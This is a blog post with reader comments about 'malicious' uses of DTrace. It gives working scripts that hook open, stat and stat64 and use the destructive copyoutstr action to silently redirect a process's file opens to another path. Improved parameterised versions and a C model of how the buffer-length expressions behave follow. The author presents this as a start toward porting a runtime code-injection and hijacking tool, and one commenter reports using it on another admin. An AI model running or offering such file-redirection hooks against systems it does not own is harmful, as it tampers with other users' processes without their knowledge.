Malicious DTrace

One of the great things about being bored sitting at a datacenter waiting for long processes to finish is the opportunity to fill that mind-numbing boredom with useful knowledge. I spent the past little while learning DTrace. I gotta say, I love it. The SolarisInternals site has many good scripts to help teach DTrace. One of the things I'd like to do with DTrace is use it for malicious purposes. In my Linux days, I authored a project called Project Hijack, which allows an attacker to effortlessly inject arbitrary code into a process at runtime and hijack dynamically loaded functions. I'd like to port that project, or as much of it as possible, to DTrace.

It took me about 30 minutes to be comfortable writing simple DTrace scripts. Here's one tiny malicious script I wrote:

/* fires on entry to open(2), but only when the pathname argument is /tmp/mal.txt */
syscall::open:entry
/copyinstr(arg0) == "/tmp/mal.txt"/
{
	/* destructive action: overwrite the caller's pathname buffer in user space
	   before the kernel copies the path in */
	copyoutstr("/tmp/haha.txt", arg0, strlen("/tmp/haha.txt"));
}

Any time an application tries to open /tmp/mal.txt, the application will actually open /tmp/haha.txt. The probe fires on entry to open(2), before the kernel has copied the pathname in, and copyoutstr overwrites the caller's own buffer in user space, so the process ends up opening a file it never asked for. copyoutstr is a destructive action, so DTrace will only run this with destructive actions enabled and the privileges they require, which in practice means root. The script is that simple, which is exactly why I love DTrace.

I'll write more about it later. The processes I'm running on our production server are almost finished. Also, I'll be at Defcon. If you wanna meet up, let me know. Drop a comment or send me an email.

Comments

Improvement


/* $1 = pathname to intercept, $2 = replacement, both passed as script arguments */
syscall::open:entry
/copyinstr(arg0) == $1/
{
	copyoutstr($2, arg0, strlen($1) > strlen($2) ? strlen($1) : strlen($2));
}

OpenSolaris Version

When I originally wrote this article, I tested the scripts on OS X. However, when I tried it on OpenSolaris b134, it didn't work. Here's the revised version that works on OpenSolaris:


/* $1 = pathname to intercept, $2 = replacement; the +1 makes the copy include
   the NUL terminator */
syscall::open:entry, syscall::stat:entry, syscall::stat64:entry
/copyinstr(arg0) == $1/
{
	copyoutstr($2, arg0, (strlen($1) > strlen($2)) ? strlen($1)+1 : strlen($2)+1);
}
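The three scripts on this page differ only in the length they pass to copyoutstr, and that length decides whether the rewritten path ends up NUL-terminated in the caller's buffer. The following C program is an editor-added model, not DTrace's code and not from the post or its commenters: it assumes, as in the Solaris implementation, that copyoutstr copies bytes until it has copied a NUL or reached maxlen, whichever comes first, and then checks what the kernel would read back for each of the page's three length expressions (named maxlen_original, maxlen_improvement and maxlen_opensolaris here). It shows that the max() in the "Improvement" comment fixes the case where the replacement is shorter than the original path, and the +1 in the OpenSolaris version fixes the case where it is longer.

```c
#include <stdio.h>
#include <string.h>

/*
 * Model of the copyoutstr copy loop (editor-added; not DTrace's own code).
 * Assumption: as in the Solaris implementation, bytes are copied one at a
 * time and the loop stops after it has copied a NUL byte or after maxlen
 * bytes, whichever comes first. The terminator therefore only reaches the
 * destination when maxlen is at least strlen(src) + 1.
 */
static size_t model_copyoutstr(const char *src, char *dst, size_t maxlen)
{
    size_t n = 0;
    while (n < maxlen) {
        dst[n] = src[n];
        n++;
        if (src[n - 1] == '\0')
            break;
    }
    return n;
}

/* The three maxlen expressions used by the scripts on this page. */
static size_t maxlen_original(const char *orig, const char *repl)
{
    (void)orig;                      /* the first script ignores the old path */
    return strlen(repl);
}

static size_t maxlen_improvement(const char *orig, const char *repl)
{
    return strlen(orig) > strlen(repl) ? strlen(orig) : strlen(repl);
}

static size_t maxlen_opensolaris(const char *orig, const char *repl)
{
    return maxlen_improvement(orig, repl) + 1;
}

#define USERBUF 64   /* simulated pathname buffer inside the traced process */

/*
 * Simulate the traced process: its buffer holds `orig` followed by whatever
 * bytes happened to sit after it in memory, the probe rewrites it with `repl`
 * using the given maxlen, and the kernel then reads the buffer as a C string.
 * Returns 1 if the kernel would see exactly `repl`, 0 if it would see
 * something else (an unterminated path or one with stale bytes on the end).
 */
static int rewrite_ok(const char *orig, const char *repl, size_t maxlen)
{
    char buf[USERBUF];
    memset(buf, 'X', sizeof buf);    /* constructed "garbage" after the path */
    buf[sizeof buf - 1] = '\0';      /* hard stop so the demo stays in bounds */
    strcpy(buf, orig);
    model_copyoutstr(repl, buf, maxlen);
    return strcmp(buf, repl) == 0;
}

int main(void)
{
    /* constructed sample paths covering the three length relationships */
    const char *cases[][2] = {
        { "/tmp/mal.txt",  "/tmp/haha.txt" },  /* replacement longer  */
        { "/tmp/haha.txt", "/tmp/mal.txt"  },  /* replacement shorter */
        { "/tmp/a.txt",    "/tmp/b.txt"    },  /* same length         */
    };
    size_t i;
    for (i = 0; i < sizeof cases / sizeof cases[0]; i++) {
        const char *o = cases[i][0], *r = cases[i][1];
        printf("%-14s -> %-14s original:%d improvement:%d opensolaris:%d\n",
               o, r,
               rewrite_ok(o, r, maxlen_original(o, r)),
               rewrite_ok(o, r, maxlen_improvement(o, r)),
               rewrite_ok(o, r, maxlen_opensolaris(o, r)));
    }
    return 0;
}
```

Under this model the first script only works when the two paths have the same length, the "Improvement" additionally handles a shorter replacement, and only the OpenSolaris version handles a longer one. Two things the model deliberately leaves out: a longer replacement also writes past the end of the caller's original string, which none of the scripts check for, and the model makes no claim about how OS X's DTrace behaves, so it does not explain why the first script appeared to work there.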

Need open64 on some systems

Simple fun, pulled this on another admin today, oh the craziness that ensued...
